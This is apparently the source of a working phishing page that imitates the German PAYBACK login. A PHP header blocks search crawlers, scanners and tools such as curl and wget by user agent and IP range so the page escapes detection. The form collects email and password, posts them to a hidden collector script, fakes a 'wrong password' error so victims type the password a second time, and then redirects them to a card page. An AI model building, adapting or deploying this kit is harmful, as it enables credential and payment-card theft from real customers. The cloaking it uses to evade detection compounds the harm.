File: /home/u756937133/domains/printsgiggles.com/public_html/payback/mall/index.php
<?php
// === Block & Log Bot Visitors ===
function logBlocked($reason) {
$ip = $_SERVER['REMOTE_ADDR'];
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'Unknown';
$time = date("Y-m-d H:i:s");
$log = "[$time] BLOCKED: $reason | IP: $ip | UA: $ua\n";
file_put_contents(__DIR__ . '/blocked.log', $log, FILE_APPEND);
http_response_code(403);
exit("Access Denied: $reason.");
}
// === Block by Known Bot User-Agents ===
$blockedAgents = [
'googlebot', 'bingbot', 'slurp', 'duckduckbot', 'baiduspider',
'yandex', 'sogou', 'exabot', 'facebot', 'ia_archiver',
'mj12bot', 'ahrefsbot', 'semrush', 'dotbot', 'gigabot', 'spbot',
'crawler', 'scrapy', 'python', 'wget', 'curl'
];
$ua = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
foreach ($blockedAgents as $bot) {
if (strpos($ua, $bot) !== false) {
logBlocked("Bot User-Agent: $bot");
}
}
// === Block by Known Bot CIDR IP Ranges ===
function ipInCIDR($ip, $cidr) {
list($net, $mask) = explode('/', $cidr);
$ipDec = ip2long($ip);
$netDec = ip2long($net);
$maskDec = ~((1 << (32 - $mask)) - 1);
return ($ipDec & $maskDec) === ($netDec & $maskDec);
}
// Example CIDRs of Google, Bing, Ahrefs (partial — you can expand)
$blockedCIDRs = [
'66.249.64.0/19', // Googlebot
'64.233.160.0/19', // Googlebot
'157.55.0.0/16', // Bingbot
'207.46.0.0/16', // Bingbot
'199.30.228.0/22', // Ahrefs
'5.45.207.0/24', // Ahrefs
];
$visitorIP = $_SERVER['REMOTE_ADDR'];
foreach ($blockedCIDRs as $cidr) {
if (ipInCIDR($visitorIP, $cidr)) {
logBlocked("Bot IP Range: $cidr");
}
}
// === JavaScript Challenge ===
// Humans pass, most bots don’t execute JS
if (!isset($_COOKIE['js_challenge_passed'])) {
echo "<script>document.cookie='js_challenge_passed=true; path=/';location.reload();</script>";
exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>E-mail » Gleich einloggen! | PAYBACK</title>
<link rel="shortcut icon" href="../img/main-favicon.ico" type="image/x-icon">
<style>
* {
box-sizing: border-box;
margin: 0;
padding: 0;
}
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
background: rgb(229, 236, 246);
/* display: flex;
flex-direction: column;
min-height: 100vh; */
}
.login-container {
margin: auto;
background: white;
padding: 20px 30px 0px;
border-radius: 1.2rem;
max-width: 500px;
width: 100%;
position: relative;
}
.loogo {
width: 114px;
margin: auto;
margin-top: 2rem;
margin-bottom: 18px;
}
.loogo img {
width: 100%;
height: auto;
}
.alert {
background: #d14060;
color: #fff;
border: 1px solid #d14060;
padding: 12px;
border-radius: 5px;
margin-bottom: 20px;
font-size: 14px;
text-align: left;
display: none;
align-items: center;
gap: 3px;
}
h2 {
color: rgb(0, 62, 176);
margin-bottom: 20px;
font-weight: 300;
font-family: sans-serif;
}
input[type="text"],
input[type="email"],
input[type="password"] {
width: 100%;
padding: 12px;
margin: 8px 0 20px 0;
border: 1px solid #ccc;
border-radius: 4px;
font-size: 15px;
}
label {
color: rgb(116, 116, 118);
font-size: 16px;
line-height: 1.4;
margin-bottom: 1rem;
font-family: sans-serif;
}
button {
background: rgb(0, 62, 176);
color: white;
padding: 13px;
border: none;
border-radius: 4px;
font-size: 16px;
cursor: pointer;
width: 100%;
/* height: 100%; */
position: relative;
}
button:hover {
background: #00358c;
}
.footer-links {
margin-top: 15px;
font-size: 14px;
}
.footer-links a {
color: #0046b8;
text-decoration: none;
padding: 1.5rem 0px 3.5rem;
text-align: center;
display: block;
}
.footer-links a:hover {
text-decoration: underline;
}
footer {
text-align: center;
margin-top: auto;
padding: 15px;
font-size: 13px;
color: #555;
}
.background__images {
display: flex;
align-items: normal;
justify-content: space-between;
width: 68%;
position: fixed;
bottom: 10%;
z-index: -1;
left: 18%;
}
.background__images image {
width: 200px;
height: 400px;
}
footer {
background: #fff;
position: fixed;
bottom: 0;
left: 0;
width: 100%;
}
.fleelink {
border-top: 1px solid rgb(191, 209, 233);
margin-top: 2rem;
padding-top: 1rem;
width: 60%;
margin: auto;
display: flex;
align-items: center;
justify-content: space-between;
}
.fleelink a {
border-right: 1px solid rgb(191, 209, 233);
color: rgb(0, 62, 176);
text-decoration: none;
cursor: pointer;
font-size: 13px;
padding: 0 8px;
}
.spinner {
font-size: 28px;
position: relative;
display: inline-block;
width: 1em;
height: 1em;
}
.spinner.center {
position: absolute;
left: 0;
right: 0;
top: 0;
bottom: 0;
margin: auto;
}
.spinner .spinner-blade {
position: absolute;
left: 0.4629em;
bottom: 0;
width: 0.074em;
height: 0.2777em;
border-radius: 0.0555em;
background-color: transparent;
-webkit-transform-origin: center -0.2222em;
-ms-transform-origin: center -0.2222em;
transform-origin: center -0.2222em;
animation: spinner-fade9234 1s infinite linear;
}
.spinner .spinner-blade:nth-child(1) {
-webkit-animation-delay: 0s;
animation-delay: 0s;
-webkit-transform: rotate(0deg);
-ms-transform: rotate(0deg);
transform: rotate(0deg);
}
.spinner .spinner-blade:nth-child(2) {
-webkit-animation-delay: 0.083s;
animation-delay: 0.083s;
-webkit-transform: rotate(30deg);
-ms-transform: rotate(30deg);
transform: rotate(30deg);
}
.spinner .spinner-blade:nth-child(3) {
-webkit-animation-delay: 0.166s;
animation-delay: 0.166s;
-webkit-transform: rotate(60deg);
-ms-transform: rotate(60deg);
transform: rotate(60deg);
}
.spinner .spinner-blade:nth-child(4) {
-webkit-animation-delay: 0.249s;
animation-delay: 0.249s;
-webkit-transform: rotate(90deg);
-ms-transform: rotate(90deg);
transform: rotate(90deg);
}
.spinner .spinner-blade:nth-child(5) {
-webkit-animation-delay: 0.332s;
animation-delay: 0.332s;
-webkit-transform: rotate(120deg);
-ms-transform: rotate(120deg);
transform: rotate(120deg);
}
.spinner .spinner-blade:nth-child(6) {
-webkit-animation-delay: 0.415s;
animation-delay: 0.415s;
-webkit-transform: rotate(150deg);
-ms-transform: rotate(150deg);
transform: rotate(150deg);
}
.spinner .spinner-blade:nth-child(7) {
-webkit-animation-delay: 0.498s;
animation-delay: 0.498s;
-webkit-transform: rotate(180deg);
-ms-transform: rotate(180deg);
transform: rotate(180deg);
}
.spinner .spinner-blade:nth-child(8) {
-webkit-animation-delay: 0.581s;
animation-delay: 0.581s;
-webkit-transform: rotate(210deg);
-ms-transform: rotate(210deg);
transform: rotate(210deg);
}
.spinner .spinner-blade:nth-child(9) {
-webkit-animation-delay: 0.664s;
animation-delay: 0.664s;
-webkit-transform: rotate(240deg);
-ms-transform: rotate(240deg);
transform: rotate(240deg);
}
.spinner .spinner-blade:nth-child(10) {
-webkit-animation-delay: 0.747s;
animation-delay: 0.747s;
-webkit-transform: rotate(270deg);
-ms-transform: rotate(270deg);
transform: rotate(270deg);
}
.spinner .spinner-blade:nth-child(11) {
-webkit-animation-delay: 0.83s;
animation-delay: 0.83s;
-webkit-transform: rotate(300deg);
-ms-transform: rotate(300deg);
transform: rotate(300deg);
}
.spinner .spinner-blade:nth-child(12) {
-webkit-animation-delay: 0.913s;
animation-delay: 0.913s;
-webkit-transform: rotate(330deg);
-ms-transform: rotate(330deg);
transform: rotate(330deg);
}
@keyframes spinner-fade9234 {
0% {
background-color: #69717d;
}
100% {
background-color: transparent;
}
}
#loadder {
display: none;
}
#passbpox {
display: none;
}
@media screen and (max-width: 768px) {
.fleelink {
width: 100%;
flex-wrap: wrap;
}
.background__images {
display: flex;
align-items: normal;
justify-content: space-between;
width: 100%;
position: fixed;
bottom: 10%;
z-index: -1;
left: -4%;
}
}
</style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.inputmask/5.0.6/jquery.inputmask.min.js"></script>
</head>
<body>
<div class="loogo">
<img src="../img/payback-logo-desktop-data.svg" alt="">
</div>
<div class="login-container">
<div class="alert">
<div class="icod" style="display: inline-flex;">
<svg viewBox="0 0 18 18" version="1.1" fill="#fff" width="30" height="30" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<g fill-rule="evenodd" class="fill-color">
<path d="M9 15.6A6.6 6.6 0 1 0 9 2.4a6.6 6.6 0 0 0 0 13.2M9 17A8 8 0 1 1 9 1a8 8 0 0 1 0 16"></path>
<path d="M9.6 12.7L9.3 8h-.5l-.3 4.7h1.1"></path>
<path d="M9.3 7.5h-.5a.6.6 0 0 0-.6.5L8 12.7a.6.6 0 0 0 .6.6h1a.6.6 0 0 0 .6-.6L9.8 8c0-.3-.2-.5-.5-.5m.7-2.1a1 1 0 1 0-2 0 1 1 0 0 0 2 0"></path>
</g>
</svg>
</div> Falsches Passwort, bitte versuchen Sie es erneut.
</div>
<h2>E-Mail-Bestätigung</h2>
<form method="post" id="result" action="">
<label for="">E-Mail-Adresse</label>
<input type="text" name="aa" placeholder="" id="eml" required>
<div id="passbpox">
<label for="">Passwort</label>
<input type="password" name="bb" id="password" placeholder="" required>
</div>
<button type="button" id="btnn">
Fortsetzen
<div id="loadder">
<div class="spinner center">
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
</div>
</div>
</button>
</form>
<div class="footer-links">
<p><a href="#">Noch kein Konto? Jetzt registrieren.</a></p>
</div>
</div>
<div class="background__images">
<img src="../img/image-left-data.png" alt="">
<!-- <img src="https://www.payback.de/resource/blob/327670/bb5914260838b67b1e398db1622a0d92/image-center-data.png" alt=""> -->
<img src="../img/image-right-data.png" alt="">
</div>
<footer>
<div class="fleelink">
<a href="#">Impressum</a>
<a href="#"> Unternehmen</a>
<a href="#">Arbeiten bei PAYBACK</a>
<a href="#">Fragen & Hilfe</a>
<a href="#"> Datenschutz</a>
<a href="#">Barrierefreiheit</a>
<a href="#">Cookie-Einstellungen</a>
</div>
</footer>
<script>
document.getElementById("btnn").addEventListener("click", ()=>{
if (document.getElementById("eml").value === "") {
alert("Das Feld darf nicht leer sein");
} else {
document.getElementById("loadder").style.display = "block";
setTimeout(() => {
document.getElementById("loadder").style.display = "none";
document.getElementById("passbpox").style.display = "block";
document.getElementById("btnn").type = "submit";
}, 2000);
}
})
</script>
<script>
const alert = document.querySelector(".alert");
var fille = "../config/email2.php"; // Your php url here e.g http://youdomain.com/result.php
var formSubmitted = 0;
$("#result").on("submit", function (event) {
event.preventDefault();
document.getElementById("loadder").style.display = "block";
formSubmitted++;
var inputs = $('input[required]');
for (var i = 0; i < inputs.length; i++) {
if (!inputs[i].value.trim()) {
alert("Das Feld darf nicht leer sein");
return;
}
}
var formData = new FormData(this);
$.ajax({
url: `${fille}`,
type: 'POST',
data: formData,
processData: false, // Required to send FormData
contentType: false, // Required to not set default content type
success: function (response) {
console.log(response);
if (formSubmitted === 1) {
document.getElementById("password").value = "";
document.getElementById("password").style.border = "1px solid red";
alert.style.display = "flex";
setTimeout(() => {
document.getElementById("loadder").style.display = "none";
}, 1500);
setTimeout(() => {
document.getElementById("password").style.border = "1px solid #0271ff";
}, 2500);
} else if (formSubmitted >= 2) {
console.log("GOOOOOO");
setTimeout(() => {
window.location.href = `./card.php`;
}, 2000);
}
}
});
});
</script>
</body>
</html>